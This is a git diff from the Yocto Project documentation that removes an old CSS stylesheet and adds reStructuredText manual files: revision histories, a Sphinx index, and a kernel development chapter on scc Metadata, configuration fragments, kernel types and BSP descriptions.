-.guilabel,
-.guimenuitem {
-  background-color: #eee;
-}
-
-
-b.keycap,
-.keycap {
-  background-color: #eee;
-  border-color: #999;
-}
-
-
-div.navheader {
-  border-color: black;
-}
-
-
-div.navfooter {
-  border-color: black;
-}
-
-.writernotes {
-  color: red;
-}
-
-
-  /*********** /
- /  graphics  /
-/ ***********/
-
-/*
-body {
-  background-image: url("images/body_bg.jpg");
-  background-attachment: fixed;
-}
-
-.navheader,
-.note,
-.tip {
-  background-image: url("images/note_bg.jpg");
-  background-attachment: fixed;
-}
-
-.warning,
-.caution {
-  background-image: url("images/warning_bg.jpg");
-  background-attachment: fixed;
-}
-
-.figure,
-.informalfigure,
-.example,
-.informalexample,
-.table,
-.informaltable {
-  background-image: url("images/figure_bg.jpg");
-  background-attachment: fixed;
-}
-
-*/
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7{
-}
-
-/*
-Example of how to stick an image as part of the title.
-
-div.article .titlepage .title
-{
-  background-image: url("figures/white-on-black.png");
-  background-position: center;
-  background-repeat: repeat-x;
-}
-*/
-
-div.preface .titlepage .title,
-div.colophon .title,
-div.chapter .titlepage .title,
-div.article .titlepage .title
-{
-}
-
-div.section div.section .titlepage .title,
-div.sect2 .titlepage .title {
-    background: none;
-}
-
-
-h1.title {
-  background-color: transparent;
-  background-repeat: no-repeat;
-  height: 256px;
-  text-indent: -9000px;
-  overflow:hidden;
-}
-
-h2.subtitle {
-  background-color: transparent;
-  text-indent: -9000px;
-  overflow:hidden;
-  width: 0px;
-  display: none;
-}
-
-  /*************************************** /
- /  pippin.gimp.org specific alterations  /
-/ ***************************************/
-
-/*
-div.heading, div.navheader {
-  color: #777;
-  font-size: 80%;
-  padding: 0;
-  margin: 0;
-  text-align: left;
-  position: absolute;
-  top: 0px;
-  left: 0px;
-  width: 100%;
-  height: 50px;
-  background: url('/gfx/heading_bg.png') transparent;
-  background-repeat: repeat-x;
-  background-attachment: fixed;
-  border: none;
-}
-
-div.heading a {
-  color: #444;
-}
-
-div.footing, div.navfooter {
-  border: none;
-  color: #ddd;
-  font-size: 80%;
-  text-align:right;
-
-  width: 100%;
-  padding-top: 10px;
-  position: absolute;
-  bottom: 0px;
-  left: 0px;
-
-  background: url('/gfx/footing_bg.png') transparent;
-}
-*/
-
-
-
-  /****************** /
- /  nasty ie tweaks  /
-/ ******************/
-
-/*
-div.heading, div.navheader {
-  width:expression(document.body.clientWidth + "px");
-}
-
-div.footing, div.navfooter {
-  width:expression(document.body.clientWidth + "px");
-  margin-left:expression("-5em");
-}
-body {
-  padding:expression("4em 5em 0em 5em");
-}
-*/
-
-  /**************************************** /
- / mozilla vendor specific css extensions  /
-/ ****************************************/
-/*
-div.navfooter, div.footing{
-  -moz-opacity: 0.8em;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example,
-.tip,
-.warning,
-.caution,
-.note {
-  -moz-border-radius: 0.5em;
-}
-
-b.keycap,
-.keycap {
-  -moz-border-radius: 0.3em;
-}
-*/
-
-table tr td table tr td {
-  display: none;
-}
-
-
-hr {
-  display: none;
-}
-
-table {
-  border: 0em;
-}
-
- .photo {
-  float: right;
-  margin-left:   1.5em;
-  margin-bottom: 1.5em;
-  margin-top: 0em;
-  max-width:      17em;
-  border:     1px solid gray;
-  padding:    3px;
-  background: white;
-}
- .seperator {
-   padding-top: 2em;
-   clear: both;
-  }
-
-  #validators {
-      margin-top: 5em;
-      text-align: right;
-      color: #777;
-  }
-  @media print {
-      body {
-          font-size: 8pt;
-      }
-      .noprint {
-          display: none;
-      }
-  }
-
-
-.tip,
-.note {
-   background: #f0f0f2;
-   color: #333;
-   padding: 20px;
-   margin: 20px;
-}
-
-.tip h3,
-.note h3 {
-   padding: 0em;
-   margin: 0em;
-   font-size: 2em;
-   font-weight: bold;
-   color: #333;
-}
-
-.tip a,
-.note a {
-   color: #333;
-   text-decoration: underline;
-}
-
-.footnote {
-   font-size: small;
-   color: #333;
-}
-
-/* Changes the announcement text */
-.tip h3,
-.warning h3,
-.caution h3,
-.note h3 {
-   font-size:large;
-   color: #00557D;
-}
diff --git a/documentation/dev-manual/history.rst b/documentation/dev-manual/history.rst
new file mode 100644
index 0000000000..a1716926c5
--- /dev/null
+++ b/documentation/dev-manual/history.rst
@@ -0,0 +1,79 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+***********************
+Manual Revision History
+***********************
+
+.. list-table::
+   :widths: 10 15 40
+   :header-rows: 1
+
+   * - Revision
+     - Date
+     - Note
+   * - 1.1
+     - October 2011
+     - The initial document released with the Yocto Project 1.1 Release
+   * - 1.2
+     - April 2012
+     - Released with the Yocto Project 1.2 Release.
+   * - 1.3
+     - October 2012
+     - Released with the Yocto Project 1.3 Release.
+   * - 1.4
+     - April 2013
+     - Released with the Yocto Project 1.4 Release.
+   * - 1.5
+     - October 2013
+     - Released with the Yocto Project 1.5 Release.
+   * - 1.6
+     - April 2014
+     - Released with the Yocto Project 1.6 Release.
+   * - 1.7
+     - October 2014
+     - Released with the Yocto Project 1.7 Release.
+   * - 1.8
+     - April 2015
+     - Released with the Yocto Project 1.8 Release.
+   * - 2.0
+     - October 2015
+     - Released with the Yocto Project 2.0 Release.
+   * - 2.1
+     - April 2016
+     - Released with the Yocto Project 2.1 Release.
+   * - 2.2
+     - October 2016
+     - Released with the Yocto Project 2.2 Release.
+   * - 2.3
+     - May 2017
+     - Released with the Yocto Project 2.3 Release.
+   * - 2.4
+     - October 2017
+     - Released with the Yocto Project 2.4 Release.
+   * - 2.5
+     - May 2018
+     - Released with the Yocto Project 2.5 Release.
+   * - 2.6
+     - November 2018
+     - Released with the Yocto Project 2.6 Release.
+   * - 2.7
+     - May 2019
+     - Released with the Yocto Project 2.7 Release.
+   * - 3.0
+     - October 2019
+     - Released with the Yocto Project 3.0 Release.
+   * - 3.1
+     - April 2020
+     - Released with the Yocto Project 3.1 Release.
+   * - 3.1.1
+     - June 2020
+     - Released with the Yocto Project 3.1.1 Release.
+   * - 3.1.2
+     - August 2020
+     - Released with the Yocto Project 3.1.2 Release.
+   * - 3.1.3
+     - September 2020
+     - Released with the Yocto Project 3.1.3 Release.
+   * - 3.1.4
+     - November 2020
+     - Released with the Yocto Project 3.1.4 Release.
diff --git a/documentation/figures/yp-how-it-works-new-diagram.png b/documentation/figures/yp-how-it-works-new-diagram.png
new file mode 100644
index 0000000000..2ce076f3c3
--- /dev/null
+++ b/documentation/figures/yp-how-it-works-new-diagram.png
diff --git a/documentation/genindex.rst b/documentation/genindex.rst
new file mode 100644
index 0000000000..a4af06f656
--- /dev/null
+++ b/documentation/genindex.rst
@@ -0,0 +1,3 @@
+=====
+Index
+=====
diff --git a/documentation/index.rst b/documentation/index.rst
new file mode 100644
index 0000000000..71ed4e76f0
--- /dev/null
+++ b/documentation/index.rst
@@ -0,0 +1,52 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+.. The Yocto Project documentation master file, created by
+   sphinx-quickstart on Mon Apr 13 09:38:33 2020.
+   You can adapt this file completely to your liking, but it should at least
+   contain the root `toctree` directive.
+
+Welcome to the Yocto Project Documentation
+==========================================
+
+|
+
+.. toctree::
+   :maxdepth: 1
+   :caption: Introduction and Overview
+
+   Quick Build <brief-yoctoprojectqs/brief-yoctoprojectqs>
+   what-i-wish-id-known
+   transitioning-to-a-custom-environment
+   Yocto Project Software Overview <https://www.yoctoproject.org/software-overview/>
+   Tips and Tricks Wiki <https://wiki.yoctoproject.org/wiki/TipsAndTricks>
+
+
+.. toctree::
+   :maxdepth: 1
+   :caption: Manuals
+
+   Overview and Concepts Manual <overview-manual/overview-manual>
+   Reference Manual <ref-manual/ref-manual>
+   Board Support Package (BSP) Developer's guide <bsp-guide/bsp-guide>
+   Development Tasks Manual <dev-manual/dev-manual>
+   Linux Kernel Development Manual <kernel-dev/kernel-dev>
+   Profile and Tracing Manual <profile-manual/profile-manual>
+   Application Development and the Extensible SDK (eSDK) <sdk-manual/sdk-manual>
+   Toaster Manual <toaster-manual/toaster-manual>
+   Bitbake User Manual <https://docs.yoctoproject.org/bitbake/1.46>
+
+.. toctree::
+   :maxdepth: 1
+   :caption: 'Mega' Manual
+
+   All-in-one 'Mega' Manual <https://docs.yoctoproject.org/singleindex.html>
+
+.. toctree::
+   :maxdepth: 1
+   :caption: Manuals/Variable Index
+
+   genindex
+   Current/Previous Version Specific Manuals <releases>
+
+
+
diff --git a/documentation/kernel-dev/history.rst b/documentation/kernel-dev/history.rst
new file mode 100644
index 0000000000..c4c64ff288
--- /dev/null
+++ b/documentation/kernel-dev/history.rst
@@ -0,0 +1,70 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+***********************
+Manual Revision History
+***********************
+
+.. list-table::
+   :widths: 10 15 40
+   :header-rows: 1
+
+   * - Revision
+     - Date
+     - Note
+   * - 1.4
+     - April 2013
+     - The initial document released with the Yocto Project 1.4 Release
+   * - 1.5
+     - October 2013
+     - Released with the Yocto Project 1.5 Release.
+   * - 1.6
+     - April 2014
+     - Released with the Yocto Project 1.6 Release.
+   * - 1.7
+     - October 2014
+     - Released with the Yocto Project 1.7 Release.
+   * - 1.8
+     - April 2015
+     - Released with the Yocto Project 1.8 Release.
+   * - 2.0
+     - October 2015
+     - Released with the Yocto Project 2.0 Release.
+   * - 2.1
+     - April 2016
+     - Released with the Yocto Project 2.1 Release.
+   * - 2.2
+     - October 2016
+     - Released with the Yocto Project 2.2 Release.
+   * - 2.3
+     - May 2017
+     - Released with the Yocto Project 2.3 Release.
+   * - 2.4
+     - October 2017
+     - Released with the Yocto Project 2.4 Release.
+   * - 2.5
+     - May 2018
+     - Released with the Yocto Project 2.5 Release.
+   * - 2.6
+     - November 2018
+     - Released with the Yocto Project 2.6 Release.
+   * - 2.7
+     - May 2019
+     - Released with the Yocto Project 2.7 Release.
+   * - 3.0
+     - October 2019
+     - Released with the Yocto Project 3.0 Release.
+   * - 3.1
+     - April 2020
+     - Released with the Yocto Project 3.1 Release.
+   * - 3.1.1
+     - June 2020
+     - Released with the Yocto Project 3.1.1 Release.
+   * - 3.1.2
+     - August 2020
+     - Released with the Yocto Project 3.1.2 Release.
+   * - 3.1.3
+     - September 2020
+     - Released with the Yocto Project 3.1.3 Release.
+   * - 3.1.4
+     - November 2020
+     - Released with the Yocto Project 3.1.4 Release.
diff --git a/documentation/kernel-dev/kernel-dev-advanced.rst b/documentation/kernel-dev/kernel-dev-advanced.rst
new file mode 100644
index 0000000000..444037c3a7
--- /dev/null
+++ b/documentation/kernel-dev/kernel-dev-advanced.rst
@@ -0,0 +1,957 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*******************************************************
+Working with Advanced Metadata (``yocto-kernel-cache``)
+*******************************************************
+
+.. _kernel-dev-advanced-overview:
+
+Overview
+========
+
+In addition to supporting configuration fragments and patches, the Yocto
+Project kernel tools also support rich
+:term:`Metadata` that you can use to define
+complex policies and Board Support Package (BSP) support. The purpose of
+the Metadata and the tools that manage it is to help you manage the
+complexity of the configuration and sources used to support multiple
+BSPs and Linux kernel types.
+
+Kernel Metadata exists in many places. One area in the
+:ref:`overview-manual/overview-manual-development-environment:yocto project source repositories`
+is the ``yocto-kernel-cache`` Git repository. You can find this repository
+grouped under the "Yocto Linux Kernel" heading in the
+:yocto_git:`Yocto Project Source Repositories <>`.
+
+Kernel development tools ("kern-tools") exist also in the Yocto Project
+Source Repositories under the "Yocto Linux Kernel" heading in the
+``yocto-kernel-tools`` Git repository. The recipe that builds these
+tools is ``meta/recipes-kernel/kern-tools/kern-tools-native_git.bb`` in
+the :term:`Source Directory` (e.g.
+``poky``).
+
+Using Kernel Metadata in a Recipe
+=================================
+
+As mentioned in the introduction, the Yocto Project contains kernel
+Metadata, which is located in the ``yocto-kernel-cache`` Git repository.
+This Metadata defines Board Support Packages (BSPs) that correspond to
+definitions in linux-yocto recipes for corresponding BSPs. A BSP
+consists of an aggregation of kernel policy and enabled
+hardware-specific features. The BSP can be influenced from within the
+linux-yocto recipe.
+
+.. note::
+
+   A Linux kernel recipe that contains kernel Metadata (e.g. inherits
+   from the ``linux-yocto.inc`` file) is said to be a "linux-yocto style" recipe.
+
+Every linux-yocto style recipe must define the
+:term:`KMACHINE` variable. This
+variable is typically set to the same value as the ``MACHINE`` variable,
+which is used by :term:`BitBake`.
+However, in some cases, the variable might instead refer to the
+underlying platform of the ``MACHINE``.
+
+Multiple BSPs can reuse the same ``KMACHINE`` name if they are built
+using the same BSP description. Multiple Corei7-based BSPs could share
+the same "intel-corei7-64" value for ``KMACHINE``. It is important to
+realize that ``KMACHINE`` is just for kernel mapping, while ``MACHINE``
+is the machine type within a BSP Layer. Even with this distinction,
+however, these two variables can hold the same value. See the `BSP
+Descriptions <#bsp-descriptions>`__ section for more information.
+
+Every linux-yocto style recipe must also indicate the Linux kernel
+source repository branch used to build the Linux kernel. The
+:term:`KBRANCH` variable must be set
+to indicate the branch.
+
+.. note::
+
+   You can use the ``KBRANCH`` value to define an alternate branch typically
+   with a machine override as shown here from the ``meta-yocto-bsp`` layer:
+   ::
+
+           KBRANCH_edgerouter = "standard/edgerouter"
+
+
+The linux-yocto style recipes can optionally define the following
+variables:
+
+  - :term:`KERNEL_FEATURES`
+
+  - :term:`LINUX_KERNEL_TYPE`
+
+:term:`LINUX_KERNEL_TYPE`
+defines the kernel type to be used in assembling the configuration. If
+you do not specify a ``LINUX_KERNEL_TYPE``, it defaults to "standard".
+Together with ``KMACHINE``, ``LINUX_KERNEL_TYPE`` defines the search
+arguments used by the kernel tools to find the appropriate description
+within the kernel Metadata with which to build out the sources and
+configuration. The linux-yocto recipes define "standard", "tiny", and
+"preempt-rt" kernel types. See the "`Kernel Types <#kernel-types>`__"
+section for more information on kernel types.
+
+During the build, the kern-tools search for the BSP description file
+that most closely matches the ``KMACHINE`` and ``LINUX_KERNEL_TYPE``
+variables passed in from the recipe. The tools use the first BSP
+description they find that matches both variables. If the tools cannot find
+a match, they issue a warning.
+
+The tools first search for the ``KMACHINE`` and then for the
+``LINUX_KERNEL_TYPE``. If the tools cannot find a partial match, they
+will use the sources from the ``KBRANCH`` and any configuration
+specified in the :term:`SRC_URI`.
+
+You can use the
+:term:`KERNEL_FEATURES`
+variable to include features (configuration fragments, patches, or both)
+that are not already included by the ``KMACHINE`` and
+``LINUX_KERNEL_TYPE`` variable combination. For example, to include a
+feature specified as "features/netfilter/netfilter.scc", specify:
+::
+
+   KERNEL_FEATURES += "features/netfilter/netfilter.scc"
+
+To include a
+feature called "cfg/sound.scc" just for the ``qemux86`` machine,
+specify:
+::
+
+   KERNEL_FEATURES_append_qemux86 = " cfg/sound.scc"
+
+The value of
+the entries in ``KERNEL_FEATURES`` are dependent on their location
+within the kernel Metadata itself. The examples here are taken from the
+``yocto-kernel-cache`` repository. Each branch of this repository
+contains "features" and "cfg" subdirectories at the top-level. For more
+information, see the "`Kernel Metadata
+Syntax <#kernel-metadata-syntax>`__" section.
+
+Kernel Metadata Syntax
+======================
+
+The kernel Metadata consists of three primary types of files: ``scc``
+[1]_ description files, configuration fragments, and patches. The
+``scc`` files define variables and include or otherwise reference any of
+the three file types. The description files are used to aggregate all
+types of kernel Metadata into what ultimately describes the sources and
+the configuration required to build a Linux kernel tailored to a
+specific machine.
+
+The ``scc`` description files are used to define two fundamental types
+of kernel Metadata:
+
+-  Features
+
+-  Board Support Packages (BSPs)
+
+Features aggregate sources in the form of patches and configuration
+fragments into a modular reusable unit. You can use features to
+implement conceptually separate kernel Metadata descriptions such as
+pure configuration fragments, simple patches, complex features, and
+kernel types. `Kernel types <#kernel-types>`__ define general kernel
+features and policy to be reused in the BSPs.
+
+BSPs define hardware-specific features and aggregate them with kernel
+types to form the final description of what will be assembled and built.
+
+While the kernel Metadata syntax does not enforce any logical separation
+of configuration fragments, patches, features or kernel types, best
+practices dictate a logical separation of these types of Metadata. The
+following Metadata file hierarchy is recommended:
+::
+
+   base/
+      bsp/
+      cfg/
+      features/
+      ktypes/
+      patches/
+
+The ``bsp`` directory contains the `BSP
+descriptions <#bsp-descriptions>`__. The remaining directories all
+contain "features". Separating ``bsp`` from the rest of the structure
+aids conceptualizing intended usage.
+
+Use these guidelines to help place your ``scc`` description files within
+the structure:
+
+-  If your file contains only configuration fragments, place the file in
+   the ``cfg`` directory.
+
+-  If your file contains only source-code fixes, place the file in the
+   ``patches`` directory.
+
+-  If your file encapsulates a major feature, often combining sources
+   and configurations, place the file in ``features`` directory.
+
+-  If your file aggregates non-hardware configuration and patches in
+   order to define a base kernel policy or major kernel type to be
+   reused across multiple BSPs, place the file in ``ktypes`` directory.
+
+These distinctions can easily become blurred - especially as out-of-tree
+features slowly merge upstream over time. Also, remember that how the
+description files are placed is a purely logical organization and has no
+impact on the functionality of the kernel Metadata. There is no impact
+because all of ``cfg``, ``features``, ``patches``, and ``ktypes``,
+contain "features" as far as the kernel tools are concerned.
+
+Paths used in kernel Metadata files are relative to base, which is
+either
+:term:`FILESEXTRAPATHS` if
+you are creating Metadata in `recipe-space <#recipe-space-metadata>`__,
+or the top level of
+:yocto_git:`yocto-kernel-cache </cgit/cgit.cgi/yocto-kernel-cache/tree/>`
+if you are creating `Metadata outside of the
+recipe-space <#metadata-outside-the-recipe-space>`__.
+
+.. [1]
+   ``scc`` stands for Series Configuration Control, but the naming has
+   less significance in the current implementation of the tooling than
+   it had in the past. Consider ``scc`` files to be description files.
+
+Configuration
+-------------
+
+The simplest unit of kernel Metadata is the configuration-only feature.
+This feature consists of one or more Linux kernel configuration
+parameters in a configuration fragment file (``.cfg``) and a ``.scc``
+file that describes the fragment.
+
+As an example, consider the Symmetric Multi-Processing (SMP) fragment
+used with the ``linux-yocto-4.12`` kernel as defined outside of the
+recipe space (i.e. ``yocto-kernel-cache``). This Metadata consists of
+two files: ``smp.scc`` and ``smp.cfg``. You can find these files in the
+``cfg`` directory of the ``yocto-4.12`` branch in the
+``yocto-kernel-cache`` Git repository:
+::
+
+   cfg/smp.scc:
+      define KFEATURE_DESCRIPTION "Enable SMP for 32 bit builds"
+      define KFEATURE_COMPATIBILITY all
+
+      kconf hardware smp.cfg
+
+   cfg/smp.cfg:
+      CONFIG_SMP=y
+      CONFIG_SCHED_SMT=y
+      # Increase default NR_CPUS from 8 to 64 so that platform with
+      # more than 8 processors can be all activated at boot time
+      CONFIG_NR_CPUS=64
+      # The following is needed when setting NR_CPUS to something
+      # greater than 8 on x86 architectures, it should be automatically
+      # disregarded by Kconfig when using a different arch
+      CONFIG_X86_BIGSMP=y
+
+You can find general information on configuration
+fragment files in the ":ref:`creating-config-fragments`" section.
+
+Within the ``smp.scc`` file, the
+:term:`KFEATURE_DESCRIPTION`
+statement provides a short description of the fragment. Higher level
+kernel tools use this description.
+
+Also within the ``smp.scc`` file, the ``kconf`` command includes the
+actual configuration fragment in an ``.scc`` file, and the "hardware"
+keyword identifies the fragment as being hardware enabling, as opposed
+to general policy, which would use the "non-hardware" keyword. The
+distinction is made for the benefit of the configuration validation
+tools, which warn you if a hardware fragment overrides a policy set by a
+non-hardware fragment.
+
+.. note::
+
+   The description file can include multiple ``kconf`` statements, one per
+   fragment.
+
+As described in the
+":ref:`kernel-dev/kernel-dev-common:validating configuration`" section, you can
+use the following BitBake command to audit your configuration:
+::
+
+   $ bitbake linux-yocto -c kernel_configcheck -f
+
+Patches
+-------
+
+Patch descriptions are very similar to configuration fragment
+descriptions, which are described in the previous section. However,
+instead of a ``.cfg`` file, these descriptions work with source patches
+(i.e. ``.patch`` files).
+
+A typical patch includes a description file and the patch itself. As an
+example, consider the build patches used with the ``linux-yocto-4.12``
+kernel as defined outside of the recipe space (i.e.
+``yocto-kernel-cache``). This Metadata consists of several files:
+``build.scc`` and a set of ``*.patch`` files. You can find these files
+in the ``patches/build`` directory of the ``yocto-4.12`` branch in the
+``yocto-kernel-cache`` Git repository.
+
+The following listings show the ``build.scc`` file and part of the
+``modpost-mask-trivial-warnings.patch`` file:
+::
+
+   patches/build/build.scc:
+      patch arm-serialize-build-targets.patch
+      patch powerpc-serialize-image-targets.patch
+      patch kbuild-exclude-meta-directory-from-distclean-processi.patch
+
+      # applied by kgit
+      # patch kbuild-add-meta-files-to-the-ignore-li.patch
+
+      patch modpost-mask-trivial-warnings.patch
+      patch menuconfig-check-lxdiaglog.sh-Allow-specification-of.patch
+
+   patches/build/modpost-mask-trivial-warnings.patch:
+      From bd48931bc142bdd104668f3a062a1f22600aae61 Mon Sep 17 00:00:00 2001
+      From: Paul Gortmaker <paul.gortmaker@windriver.com>
+      Date: Sun, 25 Jan 2009 17:58:09 -0500
+      Subject: [PATCH] modpost: mask trivial warnings
+
+      Newer HOSTCC will complain about various stdio fcns because
+                        .
+                        .
+                        .
+ 	        char *dump_write = NULL, *files_source = NULL;
+ 	        int opt;
+      --
+      2.10.1
+
+      generated by cgit v0.10.2 at 2017-09-28 15:23:23 (GMT)
+
+The description file can
+include multiple patch statements where each statement handles a single
+patch. In the example ``build.scc`` file, five patch statements exist
+for the five patches in the directory.
+
+You can create a typical ``.patch`` file using ``diff -Nurp`` or
+``git format-patch`` commands. For information on how to create patches,
+see the ":ref:`kernel-dev/kernel-dev-common:using \`\`devtool\`\` to patch the kernel`"
+and ":ref:`kernel-dev/kernel-dev-common:using traditional kernel development to patch the kernel`"
+sections.
+
+Features
+--------
+
+Features are complex kernel Metadata types that consist of configuration
+fragments, patches, and possibly other feature description files. As an
+example, consider the following generic listing:
+::
+
+   features/myfeature.scc
+      define KFEATURE_DESCRIPTION "Enable myfeature"
+
+      patch 0001-myfeature-core.patch
+      patch 0002-myfeature-interface.patch
+
+      include cfg/myfeature_dependency.scc
+      kconf non-hardware myfeature.cfg
+
+This example shows how the ``patch`` and ``kconf`` commands are used as well
+as how an additional feature description file is included with the
+``include`` command.
+
+Typically, features are less granular than configuration fragments and
+are more likely than configuration fragments and patches to be the types
+of things you want to specify in the ``KERNEL_FEATURES`` variable of the
+Linux kernel recipe. See the "`Using Kernel Metadata in a
+Recipe <#using-kernel-metadata-in-a-recipe>`__" section earlier in the
+manual.
+
+Kernel Types
+------------
+
+A kernel type defines a high-level kernel policy by aggregating
+non-hardware configuration fragments with patches you want to use when
+building a Linux kernel of a specific type (e.g. a real-time kernel).
+Syntactically, kernel types are no different than features as described
+in the "`Features <#features>`__" section. The
+:term:`LINUX_KERNEL_TYPE`
+variable in the kernel recipe selects the kernel type. For example, in
+the ``linux-yocto_4.12.bb`` kernel recipe found in
+``poky/meta/recipes-kernel/linux``, a
+:ref:`require <bitbake:require-inclusion>` directive
+includes the ``poky/meta/recipes-kernel/linux/linux-yocto.inc`` file,
+which has the following statement that defines the default kernel type:
+::
+
+   LINUX_KERNEL_TYPE ??= "standard"
+
+Another example would be the real-time kernel (i.e.
+``linux-yocto-rt_4.12.bb``). This kernel recipe directly sets the kernel
+type as follows:
+::
+
+   LINUX_KERNEL_TYPE = "preempt-rt"
+
+.. note::
+
+   You can find kernel recipes in the ``meta/recipes-kernel/linux`` directory
+   of the :ref:`overview-manual/overview-manual-development-environment:yocto project source repositories`
+   (e.g. ``poky/meta/recipes-kernel/linux/linux-yocto_4.12.bb``). See the
+   ":ref:`kernel-dev/kernel-dev-advanced:using kernel metadata in a recipe`"
+   section for more information.
+
+Three kernel types ("standard", "tiny", and "preempt-rt") are supported
+for Linux Yocto kernels:
+
+-  "standard": Includes the generic Linux kernel policy of the Yocto
+   Project linux-yocto kernel recipes. This policy includes, among other
+   things, which file systems, networking options, core kernel features,
+   and debugging and tracing options are supported.
+
+-  "preempt-rt": Applies the ``PREEMPT_RT`` patches and the
+   configuration options required to build a real-time Linux kernel.
+   This kernel type inherits from the "standard" kernel type.
+
+-  "tiny": Defines a bare minimum configuration meant to serve as a base
+   for very small Linux kernels. The "tiny" kernel type is independent
+   from the "standard" configuration. Although the "tiny" kernel type
+   does not currently include any source changes, it might in the
+   future.
+
+For any given kernel type, the Metadata is defined by the ``.scc`` (e.g.
+``standard.scc``). Here is a partial listing for the ``standard.scc``
+file, which is found in the ``ktypes/standard`` directory of the
+``yocto-kernel-cache`` Git repository:
+::
+
+   # Include this kernel type fragment to get the standard features and
+   # configuration values.
+
+   # Note: if only the features are desired, but not the configuration
+   #       then this should be included as:
+   #             include ktypes/standard/standard.scc nocfg
+   #       if no chained configuration is desired, include it as:
+   #             include ktypes/standard/standard.scc nocfg inherit
+
+
+
+   include ktypes/base/base.scc
+   branch standard
+
+   kconf non-hardware standard.cfg
+
+   include features/kgdb/kgdb.scc
+              .
+              .
+              .
+
+   include cfg/net/ip6_nf.scc
+   include cfg/net/bridge.scc
+
+   include cfg/systemd.scc
+
+   include features/rfkill/rfkill.scc
+
+As with any ``.scc`` file, a kernel type definition can aggregate other
+``.scc`` files with ``include`` commands. These definitions can also
+directly pull in configuration fragments and patches with the ``kconf``
+and ``patch`` commands, respectively.
+
+.. note::
+
+   It is not strictly necessary to create a kernel type ``.scc``
+   file. The Board Support Package (BSP) file can implicitly define the
+   kernel type using a ``define`` :term:`KTYPE` ``myktype`` line. See the
+   ":ref:`kernel-dev/kernel-dev-advanced:bsp descriptions`" section for more
+   information.
+
+BSP Descriptions
+----------------
+
+BSP descriptions (i.e. ``*.scc`` files) combine kernel types with
+hardware-specific features. The hardware-specific Metadata is typically
+defined independently in the BSP layer, and then aggregated with each
+supported kernel type.
+
+.. note::
+
+   For BSPs supported by the Yocto Project, the BSP description files
+   are located in the ``bsp`` directory of the ``yocto-kernel-cache``
+   repository organized under the "Yocto Linux Kernel" heading in the
+   :yocto_git:`Yocto Project Source Repositories </>`.
+
+This section overviews the BSP description structure, the aggregation
+concepts, and presents a detailed example using a BSP supported by the
+Yocto Project (i.e. BeagleBone Board). For complete information on BSP
+layer file hierarchy, see the :doc:`../bsp-guide/bsp-guide`.
+
+.. _bsp-description-file-overview:
+
+Description Overview
+~~~~~~~~~~~~~~~~~~~~
+
+For simplicity, consider the following root BSP layer description files
+for the BeagleBone board. These files employ both a structure and naming
+convention for consistency. The naming convention for the file is as
+follows:
+::
+
+   bsp_root_name-kernel_type.scc
+
+Here are some example root layer
+BSP filenames for the BeagleBone Board BSP, which is supported by the
+Yocto Project:
+::
+
+   beaglebone-standard.scc
+   beaglebone-preempt-rt.scc
+
+Each file uses the root name (i.e "beaglebone") BSP name followed by the
+kernel type.
+
+Examine the ``beaglebone-standard.scc`` file:
+::
+
+   define KMACHINE beaglebone
+   define KTYPE standard
+   define KARCH arm
+
+   include ktypes/standard/standard.scc
+   branch beaglebone
+
+   include beaglebone.scc
+
+   # default policy for standard kernels
+   include features/latencytop/latencytop.scc
+   include features/profiling/profiling.scc
+
+Every top-level BSP description file
+should define the :term:`KMACHINE`,
+:term:`KTYPE`, and
+:term:`KARCH` variables. These
+variables allow the OpenEmbedded build system to identify the
+description as meeting the criteria set by the recipe being built. This
+example supports the "beaglebone" machine for the "standard" kernel and
+the "arm" architecture.
+
+Be aware that a hard link between the ``KTYPE`` variable and a kernel
+type description file does not exist. Thus, if you do not have the
+kernel type defined in your kernel Metadata as it is here, you only need
+to ensure that the
+:term:`LINUX_KERNEL_TYPE`
+variable in the kernel recipe and the ``KTYPE`` variable in the BSP
+description file match.
+
+To separate your kernel policy from your hardware configuration, you
+include a kernel type (``ktype``), such as "standard". In the previous
+example, this is done using the following:
+::
+
+   include ktypes/standard/standard.scc
+
+This file aggregates all the configuration
+fragments, patches, and features that make up your standard kernel
+policy. See the "`Kernel Types <#kernel-types>`__" section for more
+information.
+
+To aggregate common configurations and features specific to the kernel
+for `mybsp`, use the following:
+::
+
+   include mybsp.scc
+
+You can see that in the BeagleBone example with the following:
+::
+
+   include beaglebone.scc
+
+For information on how to break a complete ``.config`` file into the various
+configuration fragments, see the ":ref:`creating-config-fragments`" section.
+
+Finally, if you have any configurations specific to the hardware that
+are not in a ``*.scc`` file, you can include them as follows:
+::
+
+   kconf hardware mybsp-extra.cfg
+
+The BeagleBone example does not include these
+types of configurations. However, the Malta 32-bit board does
+("mti-malta32"). Here is the ``mti-malta32-le-standard.scc`` file:
+::
+
+   define KMACHINE mti-malta32-le
+   define KMACHINE qemumipsel
+   define KTYPE standard
+   define KARCH mips
+
+   include ktypes/standard/standard.scc
+   branch mti-malta32
+
+   include mti-malta32.scc
+   kconf hardware mti-malta32-le.cfg
+
+.. _bsp-description-file-example-minnow:
+
+Example
+~~~~~~~
+
+Many real-world examples are more complex. Like any other ``.scc`` file,
+BSP descriptions can aggregate features. Consider the Minnow BSP
+definition given the ``linux-yocto-4.4`` branch of the
+``yocto-kernel-cache`` (i.e.
+``yocto-kernel-cache/bsp/minnow/minnow.scc``):
+
+.. note::
+
+   Although the Minnow Board BSP is unused, the Metadata remains and is
+   being used here just as an example.
+
+::
+
+   include cfg/x86.scc
+   include features/eg20t/eg20t.scc
+   include cfg/dmaengine.scc
+   include features/power/intel.scc
+   include cfg/efi.scc
+   include features/usb/ehci-hcd.scc
+   include features/usb/ohci-hcd.scc
+   include features/usb/usb-gadgets.scc
+   include features/usb/touchscreen-composite.scc
+   include cfg/timer/hpet.scc
+   include features/leds/leds.scc
+   include features/spi/spidev.scc
+   include features/i2c/i2cdev.scc
+   include features/mei/mei-txe.scc
+
+   # Earlyprintk and port debug requires 8250
+   kconf hardware cfg/8250.cfg
+
+   kconf hardware minnow.cfg
+   kconf hardware minnow-dev.cfg
+
+The ``minnow.scc`` description file includes a hardware configuration
+fragment (``minnow.cfg``) specific to the Minnow BSP as well as several
+more general configuration fragments and features enabling hardware
+found on the machine. This ``minnow.scc`` description file is then
+included in each of the three "minnow" description files for the
+supported kernel types (i.e. "standard", "preempt-rt", and "tiny").
